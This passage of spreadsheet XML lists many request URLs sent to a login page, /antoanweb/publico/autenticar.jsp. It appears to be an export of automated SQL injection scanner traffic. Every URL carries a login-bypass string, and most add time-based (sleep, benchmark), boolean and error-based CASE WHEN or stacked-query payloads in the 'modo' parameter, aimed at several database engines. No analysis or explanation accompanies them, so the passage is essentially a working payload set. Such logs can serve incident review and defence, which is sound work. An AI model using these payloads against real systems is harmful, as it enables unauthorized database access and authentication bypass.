    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9317"or4352=sleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-623</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-685)or4352=sleep(5)and(2258=2258</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-689</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9501))or4352=sleep(5)and((6857=6857</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3456</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1518)))or4352=sleep(5)and(((2150=2150</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9556or4352=sleep(5)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-815</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1412')or4352=sleep(5)and('ynhn'='ynhn</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5801</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2219'))or4352=sleep(5)and(('gphg'='gphg</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8679</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7606')))or4352=sleep(5)and((('uads'='uads</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1910</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3704'or4352=sleep(5)and'njxz'='njxz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6943</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5326')or4352=sleep(5)and('fyfw'like'fyfw</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1185</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2372'))or4352=sleep(5)and(('moac'like'moac</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7454</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2196')))or4352=sleep(5)and((('wvpa'like'wvpa</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1522</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8023'or4352=sleep(5)and'diho'like'diho</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6542</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1594")or4352=sleep(5)and("jrli"="jrli</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4997</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4118"))or4352=sleep(5)and(("tltf"="tltf</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1139</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7951")))or4352=sleep(5)and((("xjir"="xjir</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7809</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6698"or4352=sleep(5)and"vdwi"="vdwi</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9962</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3381")or4352=sleep(5)and("swll"like"swll</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6903</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1244"))or4352=sleep(5)and(("slvs"like"slvs</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1396")))or4352=sleep(5)and((("nbed"like"nbed</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6416</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6792"or4352=sleep(5)and"nzyy"like"nzyy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7762</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9738)or8044=benchmark(5000000,md5(char(73,81,120,117)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9401</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2043')or8044=benchmark(5000000,md5(char(73,81,120,117)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6918</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3059'or8044=benchmark(5000000,md5(char(73,81,120,117)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-211</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3873"or8044=benchmark(5000000,md5(char(73,81,120,117)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1485</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9505)or8044=benchmark(5000000,md5(char(73,81,120,117)))and(2743=2743</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2881</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1543))or8044=benchmark(5000000,md5(char(73,81,120,117)))and((9818=9818</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9049</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5044)))or8044=benchmark(5000000,md5(char(73,81,120,117)))and(((2599=2599</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7492</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3775or8044=benchmark(5000000,md5(char(73,81,120,117)))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1510</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8935')or8044=benchmark(5000000,md5(char(73,81,120,117)))and('gmmc'='gmmc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6606</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5681'))or8044=benchmark(5000000,md5(char(73,81,120,117)))and(('jyyk'='jyyk</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4299</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4307')))or8044=benchmark(5000000,md5(char(73,81,120,117)))and((('swfc'='swfc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4045</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3694'or8044=benchmark(5000000,md5(char(73,81,120,117)))and'wuvv'='wuvv</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5321</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1970')or8044=benchmark(5000000,md5(char(73,81,120,117)))and('gddd'like'gddd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3634'))or8044=benchmark(5000000,md5(char(73,81,120,117)))and(('ilsp'like'ilsp</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1069</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-230')))or8044=benchmark(5000000,md5(char(73,81,120,117)))and((('ybpq'like'ybpq</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2919</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6084'or8044=benchmark(5000000,md5(char(73,81,120,117)))and'dgut'like'dgut</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6191</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8193")or8044=benchmark(5000000,md5(char(73,81,120,117)))and("vpxl"="vpxl</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6535</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3199"))or8044=benchmark(5000000,md5(char(73,81,120,117)))and(("xszj"="xszj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8329")))or8044=benchmark(5000000,md5(char(73,81,120,117)))and((("umvc"="umvc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7529</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2957"or8044=benchmark(5000000,md5(char(73,81,120,117)))and"gful"="gful</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1833</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8705")or8044=benchmark(5000000,md5(char(73,81,120,117)))and("lvkm"like"lvkm</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-433</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6650"))or8044=benchmark(5000000,md5(char(73,81,120,117)))and(("oxuy"like"oxuy</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-506</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3846")))or8044=benchmark(5000000,md5(char(73,81,120,117)))and((("olbc"like"olbc</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8533</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2140"or8044=benchmark(5000000,md5(char(73,81,120,117)))and"ukbo"like"ukbo</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(selectgenerate_series(entrar,entrar,casewhen(6844=4423)then1else0end)limit1)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(selectgenerate_series(entrar,entrar,casewhen(3336=3336)then1else0end)limit1)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(selectgenerate_series(entrar,entrar,casewhen(5473=8427)then1else0end)limit1)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(select(casewhen(138=7160)thenentrarelse138*(select138frommaster..sysdatabases)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(select(casewhen(8988=8988)thenentrarelse8988*(select8988frommaster..sysdatabases)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(select(casewhen(3531=9893)thenentrarelse3531*(select3531frommaster..sysdatabases)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(select(casewhen(2440=68)thenentrarelse1/(select0fromdual)end)fromdual)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(select(casewhen(8743=8743)thenentrarelse1/(select0fromdual)end)fromdual)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(select(casewhen(3857=3814)thenentrarelse1/(select0fromdual)end)fromdual)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=iif(6354=5419,entrar,1/0)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=iif(148=148,entrar,1/0)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=iif(4363=7304,entrar,1/0)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(casewhen2447=9355thenentrarelsenullend)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(casewhen5807=5807thenentrarelsenullend)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=(casewhen3766=1504thenentrarelsenullend)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select(casewhen(4356=5552)thenentrarelse4356*(select4356frommaster..sysdatabases)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select(casewhen(9735=9735)thenentrarelse9735*(select9735frommaster..sysdatabases)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select(casewhen(1645=7158)thenentrarelse1645*(select1645frommaster..sysdatabases)end))</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select(casewhen(1298=1694)thenentrarelse1/(select0fromdual)end)fromdual)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select(casewhen(6870=6870)thenentrarelse1/(select0fromdual)end)fromdual)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,(select(casewhen(6796=638)thenentrarelse1/(select0fromdual)end)fromdual)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,iif(1084=1665,entrar,1/0)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,iif(5875=5875,entrar,1/0)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=entrar,iif(7636=9079,entrar,1/0)</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-475</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2756);select(casewhen(5977=7181)then5977else1/(select0)end);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3814);select(casewhen(6193=6193)then6193else1/(select0)end);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9322);select(casewhen(3615=3047)then3615else1/(select0)end);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8074</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3421');select(casewhen(2924=5859)then2924else1/(select0)end);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9467');select(casewhen(6193=6193)then6193else1/(select0)end);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7490');select(casewhen(7370=517)then7370else1/(select0)end);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9649</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3276';select(casewhen(6319=6207)then6319else1/(select0)end);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9740';select(casewhen(6193=6193)then6193else1/(select0)end);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9364';select(casewhen(4907=7702)then4907else1/(select0)end);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-3292</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1474";select(casewhen(8599=8255)then8599else1/(select0)end);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8971";select(casewhen(6193=6193)then6193else1/(select0)end);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5556";select(casewhen(7248=6646)then7248else1/(select0)end);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5667</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8722);select(casewhen(4090=1438)then4090else1/(select0)end);--and(9179=9179</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-5495);select(casewhen(6193=6193)then6193else1/(select0)end);--and(9978=9978</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8528);select(casewhen(463=8060)then463else1/(select0)end);--and(967=967</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7226</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4732));select(casewhen(9857=8219)then9857else1/(select0)end);--and((4532=4532</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6949));select(casewhen(6193=6193)then6193else1/(select0)end);--and((8566=8566</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7362));select(casewhen(1348=6091)then1348else1/(select0)end);--and((4469=4469</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6637</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9937)));select(casewhen(3930=3189)then3930else1/(select0)end);--and(((9463=9463</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-639)));select(casewhen(6193=6193)then6193else1/(select0)end);--and(((8392=8392</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7703)));select(casewhen(411=8444)then411else1/(select0)end);--and(((4882=4882</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2378</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2981;select(casewhen(4736=5868)then4736else1/(select0)end);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8820;select(casewhen(6193=6193)then6193else1/(select0)end);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-6738;select(casewhen(3975=4137)then3975else1/(select0)end);--</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2789</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4275');select(casewhen(7262=7496)then7262else1/(select0)end);--and('qzke'='qzke</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2379');select(casewhen(6193=6193)then6193else1/(select0)end);--and('nynz'='nynz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2529');select(casewhen(2429=1885)then2429else1/(select0)end);--and('ixzu'='ixzu</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2417</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1271'));select(casewhen(2405=265)then2405else1/(select0)end);--and(('onjj'='onjj</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-4474'));select(casewhen(6193=6193)then6193else1/(select0)end);--and(('kbfd'='kbfd</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1701'));select(casewhen(1373=8361)then1373else1/(select0)end);--and(('wcgz'='wcgz</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-8922</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7198')));select(casewhen(1861=2072)then1861else1/(select0)end);--and((('dhms'='dhms</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-2256')));select(casewhen(6193=6193)then6193else1/(select0)end);--and((('eyrt'='eyrt</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-7353')));select(casewhen(4519=9872)then4519else1/(select0)end);--and((('vfng'='vfng</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-9742</t>
  </si>
  <si>
    <t>/antoanweb/publico/autenticar.jsp?login=61'or'61'='61&amp;pwd=frame30.&amp;remember=&amp;modo=-1379';select(casewhen(9802=9022)then9802else1/(select0)end);--and'cudp'='cudp</t>
  </si>
  <si>
